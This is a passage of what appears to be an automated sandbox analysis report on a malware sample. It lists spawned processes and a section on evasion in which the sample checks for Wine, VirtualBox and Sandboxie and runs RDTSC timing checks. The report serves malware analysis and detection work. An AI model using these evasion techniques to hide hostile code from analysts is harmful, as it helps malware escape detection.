                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: Fwkdsz.exe PID: 1748, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: Fwkdsz.exe, 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F161 second address: 80F170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jo 00007F2EE474417Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98850F second address: 988519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2EE4767536h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987587 second address: 987598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F2EE4744176h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987B49 second address: 987B53 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2EE4767536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987DF6 second address: 987DFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B79E second address: 98B7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B7AB second address: 98B7C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F2EE4744176h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B7C2 second address: 98B7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B7C6 second address: 98B7E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2EE4744176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F2EE474417Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B7E5 second address: 98B82A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F2EE4767536h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F2EE476753Ch 0x00000015 pop eax 0x00000016 sub dword ptr [ebp+122D1DC5h], esi 0x0000001c push 00000003h 0x0000001e mov edi, dword ptr [ebp+122D37C2h] 0x00000024 push 00000000h 0x00000026 clc 0x00000027 push 00000003h 0x00000029 mov edx, dword ptr [ebp+122D23D2h] 0x0000002f call 00007F2EE4767539h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B82A second address: 98B830 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B830 second address: 98B83B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F2EE4767536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B83B second address: 98B886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2EE4744188h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F2EE474417Fh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jg 00007F2EE474417Ch 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push ebx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B886 second address: 98B8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 jmp 00007F2EE4767542h 0x0000000e lea ebx, dword ptr [ebp+124505B0h] 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B923 second address: 98B96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 or esi, dword ptr [ebp+122D36DAh] 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f mov di, C930h 0x00000013 pop edi 0x00000014 call 00007F2EE4744179h 0x00000019 pushad 0x0000001a jno 00007F2EE4744178h 0x00000020 push ecx 0x00000021 jl 00007F2EE4744176h 0x00000027 pop ecx 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F2EE474417Eh 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B96B second address: 98B96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B96F second address: 98B975 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B975 second address: 98B9A8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2EE476753Ch 0x00000008 jno 00007F2EE4767536h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F2EE4767543h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e je 00007F2EE4767536h 0x00000024 pop edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B9A8 second address: 98BA20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F2EE4744176h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F2EE4744178h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 jnp 00007F2EE474417Ch 0x0000002d mov edx, dword ptr [ebp+122D1DE5h] 0x00000033 push 00000003h 0x00000035 push edi 0x00000036 xor edi, dword ptr [ebp+122D37FEh] 0x0000003c pop edi 0x0000003d mov edi, 1640E53Fh 0x00000042 push 00000000h 0x00000044 jg 00007F2EE474417Ch 0x0000004a and edx, dword ptr [ebp+122D38D2h] 0x00000050 push 00000003h 0x00000052 add edi, 7F6AEC08h 0x00000058 jg 00007F2EE4744176h 0x0000005e push DC17C075h 0x00000063 push eax 0x00000064 push edx 0x00000065 je 00007F2EE474417Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BA20 second address: 98BA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BA24 second address: 98BA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1C17C075h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F2EE4744178h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+124505B9h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F2EE4744178h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xor dword ptr [ebp+122D19B5h], esi 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BA8F second address: 98BA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BA93 second address: 98BA99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BB61 second address: 98BB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2EE4767536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BB70 second address: 98BB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98BB74 second address: 98BBD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 5A6C2DECh 0x0000000e stc 0x0000000f push 00000003h 0x00000011 pushad 0x00000012 sub dword ptr [ebp+122D27ECh], eax 0x00000018 jl 00007F2EE476753Ah 0x0000001e mov ax, 8AF9h 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov di, cx 0x00000028 push 00000003h 0x0000002a clc 0x0000002b mov dword ptr [ebp+122D1AB7h], edx 0x00000031 push 5723A97Eh 0x00000036 jmp 00007F2EE476753Ah 0x0000003b add dword ptr [esp], 68DC5682h 0x00000042 jmp 00007F2EE476753Ch 0x00000047 lea ebx, dword ptr [ebp+124505C4h] 0x0000004d sub cx, D91Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA933 second address: 9AA939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA939 second address: 9AA950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F2EE476753Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA950 second address: 9AA95D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAEA6 second address: 9AAEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB2FD second address: 9AB307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2EE4744176h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB76F second address: 9AB78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2EE4767536h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2EE476753Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB78C second address: 9AB7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2EE4744188h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A8E4 second address: 97A8F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2EE476753Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A8F8 second address: 97A8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A8FC second address: 97A900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABA8D second address: 9ABAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2EE474417Dh 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABAA1 second address: 9ABAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F2EE4767536h 0x00000009 jnp 00007F2EE4767536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC04E second address: 9AC052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC1E9 second address: 9AC1F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2EE476753Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC571 second address: 9AC577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC577 second address: 9AC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC57B second address: 9AC57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC57F second address: 9AC585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC88C second address: 9AC892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
